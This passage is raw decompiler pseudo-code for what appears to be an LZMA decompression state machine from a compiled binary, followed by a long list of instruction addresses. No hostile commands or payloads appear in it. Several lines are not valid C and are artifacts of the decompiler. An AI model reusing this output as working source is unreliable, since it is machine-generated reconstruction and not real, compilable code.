											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                              0x00000000
                                              0x00406969
                                              0x00406969
                                              0x0040696d
                                              0x00406992
                                              0x0040699c
                                              0x00000000
                                              0x0040696f
                                              0x0040696f
                                              0x00406972
                                              0x00406976
                                              0x00406979
                                              0x0040697c
                                              0x00406980
                                              0x00406980
                                              0x00406983
                                              0x00406a5d
                                              0x00406a5d
                                              0x00406a64
                                              0x00406a64
                                              0x00406a67
                                              0x00406a6e
                                              0x00406a9b
                                              0x00406a9f
                                              0x00406aff
                                              0x00406b02
                                              0x00406b07
                                              0x00406b08
                                              0x00406b0a
                                              0x00406b0c
                                              0x00406b0f
                                              0x00406a1b
                                              0x00406a1b
                                              0x00406a1b
                                              0x004061b7
                                              0x004061b7
                                              0x004061b7
                                              0x004061c0
                                              0x00000000
                                              0x00000000
                                              0x004061c6
                                              0x00000000
                                              0x004061d1
                                              0x00000000
                                              0x00000000
                                              0x004061da
                                              0x004061dd
                                              0x004061e0
                                              0x004061e4
                                              0x00000000
                                              0x00000000
                                              0x004061ea
                                              0x004061ed
                                              0x004061ef
                                              0x004061f0
                                              0x004061f3
                                              0x004061f5
                                              0x004061f6
                                              0x004061f8
                                              0x004061fb
                                              0x00406200
                                              0x00406205
                                              0x0040620e
                                              0x00406221
                                              0x00406224
                                              0x00406230
                                              0x00406258
                                              0x0040625a
                                              0x00406268
                                              0x00406268
                                              0x0040626c
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040625c
                                              0x0040625c
                                              0x0040625f
                                              0x00406260
                                              0x00406260
                                              0x00000000
                                              0x0040625c
                                              0x00406236
                                              0x0040623b
                                              0x0040623b
                                              0x00406244
                                              0x0040624c
                                              0x0040624f
                                              0x00000000
                                              0x00406255
                                              0x00406255
                                              0x00000000
                                              0x00406255
                                              0x00000000
                                              0x00406272
                                              0x00406272
                                              0x00406276
                                              0x00406b22
                                              0x00000000
                                              0x00406b22
                                              0x0040627f
                                              0x0040628f
                                              0x00406292
                                              0x00406295
                                              0x00406295
                                              0x00406295
                                              0x00406298
                                              0x0040629c
                                              0x00000000
                                              0x00000000
                                              0x0040629e
                                              0x004062a4
                                              0x004062ce
                                              0x004062d4
                                              0x004062db
                                              0x00000000
                                              0x004062db
                                              0x004062aa
                                              0x004062ad
                                              0x004062b2
                                              0x004062b2
                                              0x004062bd
                                              0x004062c5
                                              0x004062c8
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040630d
                                              0x00406313
                                              0x00406316
                                              0x00406323
                                              0x0040632b
                                              0x00000000
                                              0x00000000
                                              0x004062e2
                                              0x004062e2
                                              0x004062e6
                                              0x00406b31
                                              0x00000000
                                              0x00406b31
                                              0x004062f2
                                              0x004062fd
                                              0x004062fd
                                              0x004062fd
                                              0x00406300
                                              0x00406303
                                              0x00406306
                                              0x0040630b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x004069a2
                                              0x004069a2
                                              0x004069a8
                                              0x004069ae
                                              0x004069b4
                                              0x004069ce
                                              0x004069d1
                                              0x004069d7
                                              0x004069e2
                                              0x004069e2
                                              0x004069e4
                                              0x004069b6
                                              0x004069b6
                                              0x004069c5
                                              0x004069c9
                                              0x004069c9
                                              0x004069ee
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x004069f0
                                              0x004069f4
                                              0x00406ba3
                                              0x00000000
                                              0x00406ba3
                                              0x00406a00
                                              0x00406a07
                                              0x00406a0f
                                              0x00406a12
                                              0x00406a15
                                              0x00406a15
                                              0x00000000
                                              0x00000000
                                              0x00406333
                                              0x00406335
                                              0x00406338
                                              0x004063a9
                                              0x004063ac
                                              0x004063af
                                              0x004063b6
                                              0x004063c0
                                              0x00000000
                                              0x004063c0
                                              0x0040633a
                                              0x0040633e
                                              0x00406341
                                              0x00406343
                                              0x00406346
                                              0x00406349
                                              0x0040634b
                                              0x0040634e
                                              0x00406350
                                              0x00406355
                                              0x00406358
                                              0x0040635b
                                              0x0040635f
                                              0x00406366
                                              0x00406369
                                              0x00406370
                                              0x00406374
                                              0x0040637c
                                              0x0040637c
                                              0x0040637c
                                              0x00406376
                                              0x00406376
                                              0x00406376
                                              0x0040636b
                                              0x0040636b
                                              0x0040636b
                                              0x00406380
                                              0x00406383
                                              0x004063a1
                                              0x004063a3
                                              0x00000000
                                              0x00406385
                                              0x00406385
                                              0x00406388
                                              0x0040638b
                                              0x0040638e
                                              0x00406390
                                              0x00406390
                                              0x00406390
                                              0x00406393
                                              0x00406396
                                              0x00406398
                                              0x00406399
                                              0x0040639c
                                              0x00000000
                                              0x0040639c
                                              0x00000000
                                              0x004065d2
                                              0x004065d6
                                              0x004065f4
                                              0x004065f7
                                              0x004065fe
                                              0x00406601
                                              0x00406604
                                              0x00406607
                                              0x0040660a
                                              0x0040660d
                                              0x0040660f
                                              0x00406616
                                              0x00406617
                                              0x00406619
                                              0x0040661c
                                              0x0040661f
                                              0x00406622
                                              0x00406622
                                              0x00406627
                                              0x00000000
                                              0x00406627
                                              0x004065d8
                                              0x004065db
                                              0x004065de
                                              0x004065e8
                                              0x00000000
                                              0x00000000
                                              0x0040663c
                                              0x00406640
                                              0x00406663
                                              0x00406666
                                              0x00406669
                                              0x00406673
                                              0x00406642
                                              0x00406642
                                              0x00406645
                                              0x00406648
                                              0x0040664b
                                              0x00406658
                                              0x0040665b
                                              0x0040665b
                                              0x00000000
                                              0x00000000
                                              0x0040667f
                                              0x00406683
                                              0x00000000
                                              0x00000000
                                              0x00406689
                                              0x0040668d
                                              0x00000000
                                              0x00000000
                                              0x00406693
                                              0x00406695
                                              0x00406699
                                              0x00406699
                                              0x0040669c
                                              0x004066a0
                                              0x00000000
                                              0x00000000
                                              0x004066f0
                                              0x004066f4
                                              0x004066fb
                                              0x004066fe
                                              0x00406701
                                              0x0040670b
                                              0x00000000
                                              0x0040670b
                                              0x004066f6
                                              0x00000000
                                              0x00000000
                                              0x00406717
                                              0x0040671b
                                              0x00406722
                                              0x00406725
                                              0x00406728
                                              0x0040671d
                                              0x0040671d
                                              0x0040671d
                                              0x0040672b
                                              0x0040672e
                                              0x00406731
                                              0x00406731
                                              0x00406734
                                              0x00406737
                                              0x0040673a
                                              0x0040673a
                                              0x0040673d
                                              0x00406744
                                              0x00406749
                                              0x00000000
                                              0x00000000
                                              0x004067d7
                                              0x004067d7
                                              0x004067db
                                              0x00406b79
                                              0x00000000
                                              0x00406b79
                                              0x004067e1
                                              0x004067e4
                                              0x004067e7
                                              0x004067eb
                                              0x004067ee
                                              0x004067f4
                                              0x004067f6
                                              0x004067f6
                                              0x004067f6
                                              0x004067f9
                                              0x004067fc
                                              0x00000000
                                              0x00000000
                                              0x004063cc
                                              0x004063cc
                                              0x004063d0
                                              0x00406b3d
                                              0x00000000
                                              0x00406b3d
                                              0x004063d6
                                              0x004063d9
                                              0x004063dc
                                              0x004063e0
                                              0x004063e3
                                              0x004063e9
                                              0x004063eb
                                              0x004063eb
                                              0x004063eb
                                              0x004063ee
                                              0x004063f1
                                              0x004063f1
                                              0x004063f4
                                              0x004063f7
                                              0x00000000
                                              0x00000000
                                              0x004063fd
                                              0x00406403
                                              0x00000000
                                              0x00000000
                                              0x00406409
                                              0x00406409
                                              0x0040640d
                                              0x00406410
                                              0x00406413
                                              0x00406416
                                              0x00406419
                                              0x0040641a
                                              0x0040641d
                                              0x0040641f
                                              0x00406425
                                              0x00406428
                                              0x0040642b
                                              0x0040642e
                                              0x00406431
                                              0x00406434
                                              0x00406437
                                              0x00406453
                                              0x00406456
                                              0x00406459
                                              0x0040645c
                                              0x00406463
                                              0x00406467
                                              0x00406469
                                              0x0040646d
                                              0x00406439
                                              0x00406439
                                              0x0040643d
                                              0x00406445
                                              0x0040644a
                                              0x0040644c
                                              0x0040644e
                                              0x0040644e
                                              0x00406470
                                              0x00406477
                                              0x0040647a
                                              0x00000000
                                              0x00406480
                                              0x00000000
                                              0x00406480
                                              0x00000000
                                              0x00406485
                                              0x00406485
                                              0x00406489
                                              0x00406b49
                                              0x00000000
                                              0x00406b49
                                              0x0040648f
                                              0x00406492
                                              0x00406495
                                              0x00406499
                                              0x0040649c
                                              0x004064a2
                                              0x004064a4
                                              0x004064a4
                                              0x004064a4
                                              0x004064a7
                                              0x004064aa
                                              0x004064aa
                                              0x004064aa
                                              0x004064b0
                                              0x00000000
                                              0x00000000
                                              0x004064b2
                                              0x004064b5
                                              0x004064b8
                                              0x004064bb
                                              0x004064be
                                              0x004064c1
                                              0x004064c4
                                              0x004064c7
                                              0x004064ca
                                              0x004064cd
                                              0x004064d0
                                              0x004064e8
                                              0x004064eb
                                              0x004064ee
                                              0x004064f1
                                              0x004064f1
                                              0x004064f4
                                              0x004064f8
                                              0x004064fa
                                              0x004064d2
                                              0x004064d2
                                              0x004064da
                                              0x004064df
                                              0x004064e1
                                              0x004064e3
                                              0x004064e3
                                              0x004064fd
                                              0x00406504
                                              0x00406507
                                              0x00000000
                                              0x00406509
                                              0x00000000
                                              0x00406509
                                              0x00406507
                                              0x0040650e
                                              0x0040650e
                                              0x0040650e
                                              0x0040650e
                                              0x00000000
                                              0x00000000
                                              0x00406549
                                              0x00406549
                                              0x0040654d
                                              0x00406b55
                                              0x00000000
                                              0x00406b55
                                              0x00406553
                                              0x00406556
                                              0x00406559
                                              0x0040655d
                                              0x00406560
                                              0x00406566
                                              0x00406568
                                              0x00406568
                                              0x00406568
                                              0x0040656b
                                              0x0040656e
                                              0x0040656e
                                              0x00406574
                                              0x00406512
                                              0x00406512
                                              0x00406515
                                              0x00000000
                                              0x00406515
                                              0x00406576
                                              0x00406576
                                              0x00406579
                                              0x0040657c
                                              0x0040657f
                                              0x00406582
                                              0x00406585
                                              0x00406588
                                              0x0040658b
                                              0x0040658e
                                              0x00406591
                                              0x00406594
                                              0x004065ac
                                              0x004065af
                                              0x004065b2
                                              0x004065b5
                                              0x004065b5
                                              0x004065b8
                                              0x004065bc
                                              0x004065be
                                              0x00406596
                                              0x00406596
                                              0x0040659e
                                              0x004065a3
                                              0x004065a5
                                              0x004065a7
                                              0x004065a7
                                              0x004065c1
                                              0x004065c8
                                              0x004065cb
                                              0x00000000
                                              0x004065cd
                                              0x00000000
                                              0x004065cd
                                              0x00000000
                                              0x0040685a
